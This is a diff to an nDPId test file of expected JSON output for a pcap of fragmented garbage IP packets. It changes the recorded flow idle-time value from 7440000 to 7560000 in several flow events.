@@ -7512,8 +7512,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":3755,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028041,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAmhna2Zkc2JrbnZjLy50Z2Y="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3756,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244028045} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":3756,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244028041,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAnRnP0dSP0dS"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3757,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028345,"flow_last_seen":1534244028345,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244028345,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16243,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3757,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1534244028345,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028345,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAj9zUj83NDgzOTYpKComXiX\/oQAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":3757,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028345,"flow_last_seen":1534244028345,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":0,"thread_ts_msec":1534244028345,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16243,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3757,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1534244028345,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028345,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAj9zUj83NDgzOTYpKComXiX\/oQAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3758,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028345} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":3758,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028345,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiQjQCFAIyQlXiYqKCkoKiY="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":3759,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028345} 
@@ -8138,8 +8138,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":4068,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028345,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiNAIyQlXiYqKComXiUkIyY="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4069,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244028349} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":4069,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244028345,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAiooS0lKSEdG"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4070,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028649,"flow_last_seen":1534244028649,"flow_idle_time":7440000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244028649,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17458,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4070,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1534244028649,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028649,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkQyKiZERkdISksmXiUkIyM4jgAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4070,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028649,"flow_last_seen":1534244028649,"flow_idle_time":7560000,"flow_min_l4_payload_len":8,"flow_max_l4_payload_len":8,"flow_tot_l4_payload_len":8,"flow_avg_l4_payload_len":8,"midstream":1,"thread_ts_msec":1534244028649,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":17458,"dst_port":10790,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4070,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1534244028649,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028649,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAkQyKiZERkdISksmXiUkIyM4jgAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4071,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028649} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":4071,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028649,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAkVUUiVZXlUmSSpPUHsiOmg="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4072,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028649} 
@@ -8764,8 +8764,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":4381,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028649,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAmtkYT5MPE1OQkhHRkRFVyM="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4382,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244028653} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":4382,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244028649,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkAkJV5IQkdW"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4383,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028953,"flow_last_seen":1534244028953,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244028953,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":2612,"dst_port":12849,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4383,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1534244028953,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028953,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAgo0MjE0NjMxOTgyMDUxKSh91wAA"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4383,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244028953,"flow_last_seen":1534244028953,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244028953,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":2612,"dst_port":12849,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4383,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1534244028953,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244028953,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAgo0MjE0NjMxOTgyMDUxKSh91wAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4384,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028953} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":4384,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028953,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiomXiUkI0AjJCVeJiooKiY="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4385,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244028953} 
@@ -9390,8 +9390,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":4694,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244028953,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiNyc2RsdWhna2Zkc2JrbnY="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4695,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244028956} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":4695,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244028953,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAmMvLnRnZnRn"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4696,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029256,"flow_last_seen":1534244029256,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244029256,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16199,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4696,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1534244029256,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244029256,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAj9HUj9HUj9zUj83NDgzOTbYPAAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4696,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029256,"flow_last_seen":1534244029256,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244029256,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":16199,"dst_port":21055,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4696,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1534244029256,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244029256,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAj9HUj9HUj9zUj83NDgzOTbYPAAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4697,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244029256} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":4697,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244029256,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAikoKiZeJSQjQCFAIyQlXiY="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":4698,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244029256} 
@@ -10016,8 +10016,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5007,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244029256,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAigqJl4lJCNAIyQlXiYqKCo="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5008,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244029259} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":5008,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244029256,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAiZeJSQjJioo"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5009,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029559,"flow_last_seen":1534244029559,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244029559,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":19273,"dst_port":19016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5009,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1534244029559,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244029559,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAktJSkhHRkQyKiZERkdISkvKWwAA"} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5009,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029559,"flow_last_seen":1534244029559,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1534244029559,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":19273,"dst_port":19016,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5009,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1534244029559,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244029559,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAktJSkhHRkQyKiZERkdISkvKWwAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5010,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244029559} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5010,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244029559,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAiZeJSQjI0VUUiVZXlUmSSo="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5011,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244029559} 
@@ -10642,8 +10642,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5320,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244029559,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAiI6aGRmbGtkYT5MPE1OQkg="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5321,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244029564} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":5321,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244029559,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAkdGREVXI0Ak"} -00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5322,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029864,"flow_last_seen":1534244029864,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244029864,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9566,"dst_port":18498,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5322,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1534244029864,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244029864,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiVeSEJHVgo0MjE0NjMxOThZagAA"} +00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5322,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244029864,"flow_last_seen":1534244029864,"flow_idle_time":7560000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":1,"thread_ts_msec":1534244029864,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":9566,"dst_port":18498,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5322,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1534244029864,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244029864,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAiVeSEJHVgo0MjE0NjMxOThZagAA"} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5323,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244029864} 
00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5323,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244029864,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAkAGRa8KAAACCoAAAjIwNTEpKComXiUkI0AjJCU="} 00218{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5324,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":16,"global_ts_msec":1534244029864} 
@@ -11268,8 +11268,8 @@ 00353{"packet_event_id":1,"packet_event_name":"packet","packet_id":5633,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":50,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":50,"pkt_l4_len":0,"thread_ts_msec":1534244029864,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAibkAGQ0MKAAACCoAAAigqJl4lJCNyc2RsdWhna2Y="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":5634,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","l4_data_len":8,"global_ts_msec":1534244029868} 00341{"packet_event_id":1,"packet_event_name":"packet","packet_id":5634,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":42,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":42,"pkt_l4_len":0,"thread_ts_msec":1534244029864,"pkt":"QgEK8AABQgEK8AAbCABFAAAcAKACcEAGY0kKAAACCoAAAmRzYmtudmMv"} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":5635,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1534244030168,"flow_last_seen":1534244030168,"flow_idle_time":7440000,"flow_min_l4_payload_len":4,"flow_max_l4_payload_len":4,"flow_tot_l4_payload_len":4,"flow_avg_l4_payload_len":4,"midstream":0,"thread_ts_msec":1534244030168,"l3_proto":"ip4","src_ip":"10.0.0.2","dst_ip":"10.128.0.2","src_port":11892,"dst_port":26470,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5635,"source":"ip_fragmented_garbage.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1534244030168,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":16,"thread_ts_msec":1534244030168,"pkt":"QgEK8AABQgEK8AAbCABFAAAkAKAgAEAGRbEKAAACCoAAAi50Z2Z0Zz9HUj9HUj9zUj92mAAA"} 